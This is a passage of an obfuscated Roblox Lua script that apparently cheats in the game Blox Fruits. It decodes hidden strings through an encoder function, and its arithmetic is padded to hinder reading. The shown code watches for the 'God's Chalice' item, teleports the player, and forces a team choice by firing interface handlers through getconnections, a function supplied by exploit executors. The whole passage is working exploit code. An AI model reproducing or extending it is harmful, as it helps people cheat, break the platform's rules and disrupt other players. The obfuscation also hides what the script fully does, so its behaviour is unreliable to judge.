game.Players.LocalPlayer.Character:FindFirstChild(v7("\13\27\59\65\203\136\196\107\54\41\71\128\137\199\56\1","\162\75\114\72\53\235\231")) or game.Players.LocalPlayer.Backpack:FindFirstChild("God's Chalice") or game.Players.LocalPlayer.Character:FindFirstChild("God's Chalice")) then aut=false;Teleport();break;end end end end task.wait();end end);end end end thisCode();auto();task.spawn(function() while wait() do if (game.Players.LocalPlayer.Backpack:FindFirstChild(v7("\170\53\87\246\19\13\138\124\96\227\65\9\130\57\87\241","\98\236\92\36\130\51")) or game.Players.LocalPlayer.Character:FindFirstChild(v7("\130\16\31\174\5\167\179\112\128\24\30\177\75\173\166\35","\80\196\121\108\218\37\200\213"))) then aut=false;end end end);join=game.Players.localPlayer.Neutral==false ;if (_G.Team==nil) then _G.Team=v7("\48\122\16\126\95\11\153","\234\96\19\98\31\43\110");end _G.Team=v7("\43\30\64\206\162\119\152","\235\102\127\50\167\204\18");if (((_G.Team==v7("\96\168\231\34\80\43\67","\78\48\193\149\67\36")) or (_G.Team==v7("\29\31\146\17\79\53\13","\33\80\126\224\120"))) and  not join) then local v143=0 + 0 ;while true do if ((1182 -(229 + 953))==v143) then repeat local v230=0 -0 ;while true do if (0==v230) then wait();pcall(function() local v246=1774 -(1111 + 663) ;while true do if ((1579 -(874 + 705))==v246) then join=game.Players.localPlayer.Neutral==false ;if (_G.Team==v7("\220\161\17\197\72\233\187","\60\140\200\99\164")) then for v254,v255 in pairs({v7("\170\251\17\53\167\165\225\16\50\173\137\165\39\42\171\132\255","\194\231\148\100\70"),v7("\107\67\212\176\243\234\83\88\213\172\248\153\98\67\214\173","\168\38\44\161\195\150"),v7("\161\255\150\127\38\233\162\19\132","\118\224\156\226\22\80\136\214")}) do for v257,v258 in pairs(getconnections(game:GetService(v7("\114\226\88\153\71\252\74","\224\34\142\57")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Pirates.Frame.ViewportFrame.TextButton[v255])) do v258.Function();end end elseif (_G.Team==v7("\243\166\215\212\125\244\78","\110\190\199\165\189\19\145\61")) then for v259,v260 in pairs({v7("\247\228\98\251\142\229\207\255\99\231\133\150\249\231\126\235\128","\167\186\139\23\136\235"),v7("\55\186\157\30\31\151\157\25\14\186\134\92\62\186\159\3","\109\122\213\232"),v7("\207\244\182\57\248\246\182\53\234","\80\142\151\194")}) do for v263,v264 in pairs(getconnections(game:GetService(v7("\51\202\118\85\6\212\100","\44\99\166\23")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Marines.Frame.ViewportFrame.TextButton[v260])) do v264.Function();end end else for v261,v262 in pairs({v7("\81\248\60\37\54\134\105\227\61\57\61\245\95\251\32\53\56","\196\28\151\73\86\83"),v7("\222\12\60\3\135\122\13\98\231\12\39\65\166\87\15\120","\22\147\99\73\112\226\56\120"),v7("\153\118\246\252\155\185\97\231\241","\237\216\21\130\149")}) do for v265,v266 in pairs(getconnections(game:GetService(v7("\178\66\94\70\181\219\77","\62\226\46\63\63\208\169")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Marines.Frame.ViewportFrame.TextButton[v262])) do v266.Function();end end end break;end end end);break;end end until join==true  game:GetService(v7("\213\21\84\154\26\31\60","\62\133\121\53\227\127\109\79")).LocalPlayer.PlayerGui.Main.ChooseTeam.Visible=false;break;end end end
